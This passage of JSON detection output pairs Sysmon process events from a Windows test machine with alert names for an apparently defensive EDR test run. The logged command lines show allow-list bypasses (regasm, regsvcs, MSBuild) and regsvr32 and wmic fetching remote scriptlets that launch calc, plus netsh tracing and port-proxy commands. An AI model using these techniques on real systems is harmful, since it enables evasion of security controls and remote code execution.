C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-0010349B8800","ProcessId":6552,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4920,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:29.646278Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-662E-5D3F-0000-001011038900","ProcessId":6020,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:34.216"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4922,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:34.295068Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-662E-5D3F-0000-0010C2048900","ProcessId":1976,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:34.234"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4923,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:34.411034Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6633-5D3F-0000-001051608900","ProcessId":4092,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:39.152"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4925,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:39.312305Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6633-5D3F-0000-001092628900","ProcessId":5056,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:39.223"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4926,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:39.358048Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft .NET Assembly Registration Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=A580AF099F754953480323F6369E5534261F082E,MD5=E99BD2E860B0D73E55708200A600DA35,SHA256=CD5FBB0AC9EBBD64AE84624D428CE30FF17FD586F71F8C5580BC57B176E6716B,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6633-5D3F-0000-001051608900","ParentProcessId":4092,"ProcessGuid":"747F3D96-6633-5D3F-0000-0010D9778900","ProcessId":3512,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:39.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4928,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:39.907321Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6638-5D3F-0000-00103DA88900","ParentProcessId":1652,"ProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ProcessId":4288,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:44.622"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4931,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:44.641177Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ProcessId":4288,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-29 21:33:44.806"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4932,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:44.819320Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ParentProcessId":4288,"ProcessGuid":"747F3D96-6639-5D3F-0000-001074F48900","ProcessId":208,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:45.332"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4933,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:45.581170Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-663D-5D3F-0000-00106F608A00","ProcessId":3240,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:49.535"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4936,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:49.748805Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"MSBuild.exe","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=9672CADE96C657A8860D60923AFDBE4C46A2935D,MD5=4D7D4D92DC7D86B72ABF81821FF83837,SHA256=B60EB62F6C24D4A495A0DAB95CC49624AC5099A2CC21F8BD010A410401AB8CC3,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-663D-5D3F-0000-00106F608A00","ParentProcessId":3240,"ProcessGuid":"747F3D96-663D-5D3F-0000-001062708A00","ProcessId":5340,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:49.881"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4938,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:50.104868Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"EventData":{"CommandLine":"wmic process get brief /format:\"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c wmic process get brief /format:\"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6641-5D3F-0000-0010A38C8A00","ParentProcessId":4260,"ProcessGuid":"747F3D96-6642-5D3F-0000-0010F69D8A00","ProcessId":4896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:54.044"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4941,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:54.246154Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-29 21:33:54.618","Image":"C:\\Windows\\System32\\Wbem\\WMIC.exe","ProcessGuid":"747F3D96-6642-5D3F-0000-0010F69D8A00","ProcessId":4896,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\LQ86GWLO\\Wmic_calc[1].xsl","UtcTime":"2019-07-29 21:33:54.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4942,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:54.630548Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Capture a Network Trace with netsh.exe"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6646-5D3F-0000-0010E32E8B00","ProcessId":5084,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:58.245"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4945,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:58.256845Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Capture a Network Trace with netsh.exe"],"event":{"Event":{"EventData":{"CommandLine":"netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-0010E32E8B00","ParentProcessId":5084,"ProcessGuid":"747F3D96-6647-5D3F-0000-0010AE6E8B00","ProcessId":5056,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:59.141"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4952,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.420234Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Netsh Port Forwarding"],"event":{"Event":{"EventData":{"CommandLine":"netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-0010A7398B00","ParentProcessId":3868,"ProcessGuid":"747F3D96-6647-5D3F-0000-001065758B00","ProcessId":5048,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 